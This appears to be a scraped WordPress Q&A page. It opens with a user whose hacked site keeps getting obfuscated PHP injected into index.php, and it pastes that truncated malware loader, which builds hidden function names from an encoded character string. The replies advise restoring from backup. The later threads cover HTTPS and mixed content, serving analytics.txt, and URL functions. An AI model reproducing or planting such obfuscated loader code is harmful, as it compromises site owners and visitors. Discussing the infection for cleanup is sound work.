My Wordpress site is hacked and following code is bering added into index.php over and over - what should I do?
I have latest version of WP
<?php
$O_00__OO0O='BEGINJ6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$O0OO_0_O0_='balanced4141989';
$O00_0_OOO_=665;
$O0_0__OO0O='rD-BC-G-/F';
$O_000O__OO=1871;
$O_0_0O_OO0=array("perfecti","albuminuria","crusie","hepatocolic","duchesnea","constrainingly","flashtester","astroscopus","anonang","flagellator","diene","microgaster","deceitfully","jerker","bisect","antispreader","burring","landocrat","coletit","aurir");;
$O_0O_O_0O0='facemaker.php';
$O__OO0_O00='T4';
$O_0O0O_0O_=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O_00_O_0OO=$O_0O0O_0O_{26}.$O_0O0O_0O_{6}.$O_0O0O_0O_{10}.$O_0O0O_0O_{30}.$O_0O0O_0O_{29}.$O_0O0O_0O_{26}.$O_0O0O_0O_{30}.$O_0O0O_0O_{38}.$O_0O0O_0O_{6}.$O_0O0O_0O_{18}.$O_0O0O_0O_{23}.$O_0O0O_0O_{10}.$O_0O0O_0O_{29}.$O_0O0O_0O_{10}.$O_0O0O_0O_{12}.$O_0O0O_0O_{5}.$O_0O0O_0O_{30}.$O_0O0O_0O_{2}.$O_0O0O_0O_{35}.$O_0O0O_0O_{0}.$O_0O0O_0O_{30}.$O_0O0O_0O_{29}.$O_0O0O_0O_{33}.$O_0O0O_0O_{30}.$O_0O0O_0O_{10};$O0OO0__0_O=$O_0O0O_0O_{16}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{27}.$O_0O0O_0O_{29}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{16}.$O_0O0O_0O_{23}.$O_0O0O_0O_{6}.$O_0O0O_0O_{32}.$O_0O0O_0O_{30}.$O_0O0O_0O_{29}.$O_0O0O_0O_{32}.$O_0O0O_0O_{6}.$O_0O0O_0O_{23}.$O_0O0O_0O_{23}.$O_0O0O_0O_{3}.$O_0O0O_0O_{6}.$O_0O0O_0O_{32}.$O_0O0O_0O_{25};$O0_OOO00__=$O_0O0O_0O_{33}.$O_0O0O_0O_{10}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{6}.$O_0O0O_0O_{5}.$O_0O0O_0O_{29}.$O_0O0O_0O_{33}.$O_0O0O_0O_{35}.$O_0O0O_0O_{32}.$O_0O0O_0O_{25}.$O_0O0O_0O_{30}.$O_0O0O_0O_{10}.$O_0O0O_0O_{29}.$O_0O0O_0O_{32}.$O_0O0O_0O_{23}.$O_0O0O_0O_{12}.$O_0O0O_0O_{30}.$O_0O0O_0O_{0}.$O_0O0O_0O_{10};$O0OOO_0_0_=$O_0O0O_0O_{33}.$O_0O0O_0O_{10}.$O_0O0O_0O_{24}.$O_0O0O_0O_{30}.$O_0O0O_0O_{6}.
Normally index.php contain blew code in WordPress
<?php
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
Do you have your back files? If you have then just replaced this index.php
Also, you should add your site to Google Webmaster.
Many of the features of Google Webmaster Search Console can help you identify potential problems. Thank you.
Related
I have a site wordpress in HTTPS, but also i have an Mixed Content because of ARForms Plugin. PHP 5.6
fonts.googleapis.com and some images in this plugin unsecure, and that files i cant find in database anf template files, please help me by PHP.
Thank you.
This is what i found in configuration and this functional not work:
$arfsiteurl = home_url();
if (is_ssl() and ( !preg_match('/^https:\/\/.*\..*$/', $arfsiteurl) or ! preg_match('/^https:\/\/.*\..*$/', WP_PLUGIN_URL))) {
$arfsiteurl = str_replace('http://', 'https://', $arfsiteurl);
define('ARFURL', str_replace('http://', 'https://', WP_PLUGIN_URL . '/arforms'));
} else {
define('ARFURL', WP_PLUGIN_URL . '/arforms');
}
You should try to download these scripts locally and enqueue them with your HTTPS secure server.
As for the plugin scripts, you could also try to install this plugin and click the flush rewrite rules for it to automatically add code into your .htaccess file.
I know the topic has been already discussed, but it seems no solution was found. This is my case:
I have a wordpress site which now has SSL. However, in the theme resources are added as follows:
wp_enqueue_script( 'spectrumwp-conditional', get_template_directory_uri() . '/js/vendor/conditional.js', array('jquery'), null, true);
but get_template_directory_uri() returns the url with http not https.
Can you help me to solve this?
Edit:
I added this to my wp-config.php file
$_SERVER['HTTPS']='on';
Links to resources are shown with https:// but instead of, for example
https://www.exaple.com/wp-content/plugins/...
I have
https://www.example.com/plugins/LayerSlider/...
e.g. wp-content folder is missing
Final update:
uncommenting
define('FORCE_SSL_ADMIN', true);
and adding
if (strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false)
{ $_SERVER['HTTPS']='on'; }
just before the line
/* That's all, stop editing! Happy blogging. */
fixed the problem! Only, I recommend $_SERVER['HTTP_X_FORWARDED_PROTO'] is not used, as it may not be accurate enough.
Solved!
You need to use is_ssl() to check if the site is running https:// or http://
Here is the hook to check and redirect :
function check_if_https() {
if ( !is_ssl() ) {
wp_redirect('https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], 301 );
exit();
}
}
add_action ( 'template_redirect', 'check_if_https', 1 );
Go into Settings -> General and check the Site URL.
It sounds like the problem you're having is this value is still HTTP, not HTTPS. Approach this change with caution. Make sure you have a working backup and a full understanding of why this URL needs to change as well as the impact it will have.
get_template_directory_uri() will automatically provide a HTTPS link when site URL is set correctly.
I've been asked to add an analytics.txt file to a wordpress website so I've created the file and uploaded it to the server document root but when I go to it via the url www.examples.com/analytics.txt all I get is a 404 error.
I've checked the file permissions and I've cleared the wordpress cache but neither have helped.
Any ideas?
The folder structure is as follows:
wp-admin
wp-content
wp-includes
analytics.txt <-- added this file, but cannot seem to access it via a web browser
index.php
etc...
This is NOT the solution but it is a work-around while I carry on trying to figure out why wordpress won't allow me to access my file.
So if you're desperate and HAVE to get it sorted right now, here is what you could do, but I warn you, it's ugly! Open your index.php file and you should see something like this:
<?php
define('WP_USE_THEMES', true);
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
?>
Make a backup copy first and then add the wrapping if statement:
<?php
if ($_SERVER[REQUEST_URI] == '/analytics.txt') {
die('Put the text that you were instructed to put into your analytics.txt file in here');
} else {
define('WP_USE_THEMES', true);
require( dirname( __FILE__ ) . '/wp-blog-header.php' );
}
?>
Like I said, this is a dirty solution but when needs must and the client is getting impatient, this could help in the mean time.
Hoping that someone will have a better solution though!
I was able to get this to work with the following for the Sage theme:
Upload the analytics.txt through the theme administration panel
Copy the url of the upload and remove the hostname. For me it looked like this: app/uploads/2018/09/analytics.txt
Open the functions.php file and add the following:
function analytics_txt_rewrite(){
add_rewrite_rule('^analytics\.txt$','<route to your analytics.txt file>','top');
}
add_action('init','analytics_txt_rewrite');
Flush and regenerate the rewrite rules database: From WordPress Administration Screens, Select Settings -> Permalinks and just click Save Changes without any changes.
I am currently fixing a wordpress theme that contains absolute URLs. Example:
$.preloadImages('/wp-content/themes/themeName/img/button.png');
Now I want to prefix the url with something like WP_HOME or WP_SITEURL but I don't know which one to choose. What is the exact difference? In other words, what is the scenario in which the two might differ?
I guess they correspond to the "wordpress address" and the "site address" in the settings. However, the explanation there does not help me.
I would use neither. Use a function instead of a constant get_bloginfo('url'); or get_bloginfo('wpurl');. If you have your wp-content inside of the wordpress install it does not really matter (but I prefer the first).
Take a look at the following functions: content_url(), get_template_directory_uri() (for parent themes) or get_stylesheet_directory_uri() (for themes including child themes). When using these functions you don't rely on one particular directory structure.
In your case I'd use
trailingslashit(get_stylesheet_directory_uri()) . 'img/button.png';
EDIT
WP_SITEURL is your WordPress address (wp_url) and WP_HOME is your blog address (url). By default the wp-content directory is a sibling to wp-admin and wp-includes and both constants have the same value but you move it out of there and make use of the WP_CONTENT_FOLDERNAME, WP_CONTENT_DIR and WP_CONTENT_URL constant to move it somewhere else, e.g.
wp-content
index.php
wordpress
|-- wp-admin
|-- wp-includes
now WP_SITEURL will return https://yourdomain.com/wordpress/ and WP_HOME will be https://yourdomain.com/, see https://codex.wordpress.org/Giving_WordPress_Its_Own_Directory for more details of giving WordPress its own directory.
href="<?php echo get_template_directory_uri(); ?>/img/button.png"
so use get_template_directory_uri()
DIFFERANCE
1. get_template_directory();
<?php echo get_template_directory(); ?>
Returns an absolute server path (eg: /home/user/public_html/wp-content/themes/my_theme), not a URI.
2.get_template_directory_uri ()
Retrieve theme directory URI.
www.example.com/wp-content/theme/themename/image/image.png
AS per your query. if its for plugin then use plugin_url or for theme get_template_directory_uri()
get_template_directory_uri() . '/js/custom-script.js'
Here are other functions.
SITE URL
the site_url template tag retrieves the site url for the current site (where the WordPress core files reside) with the appropriate protocol, 'https' if is_ssl() and 'http' otherwise. If scheme is 'http' or 'https', is_ssl() is overridden.
Use this to get the "WordPress address" as defined in general settings. Use home_url() to get the "site address" as defined in general settings.
$url = site_url();
echo $url;
Output: http://www.example.com or http://www.example.com/wordpress
HOME URL
The home_url template tag retrieves the home URL for the current site, optionally with the $path argument appended. The function determines the appropriate protocol,
$url = home_url();
echo $url;
Output: http://www.example.com
So mostly both are similar. not different. you cal also use / in both to get / in output.
BLOG INFO
There is another one is blog info
function bloginfo( $show='' ) {
echo get_bloginfo( $show, 'display' );
}
<?php bloginfo('url'); ?> it will also return blog url .
home_url : Its your Home URL for your site.
site_url : Where your wordpress Core files are located.
For your use you can use site_url this will work for you.
I'm writing a WP plugin and have an issue.
In the pludin's settings area, there is a form, where the content is sent to a file (save.php) trough AJAX.
So, the save.php file has no access to WP's update_option function.
How can I use the option functions in the save.php file?
Thx!
/** Load WordPress Bootstrap */
require_once( dirname( dirname( __FILE__ ) ) . '/wp-load.php' );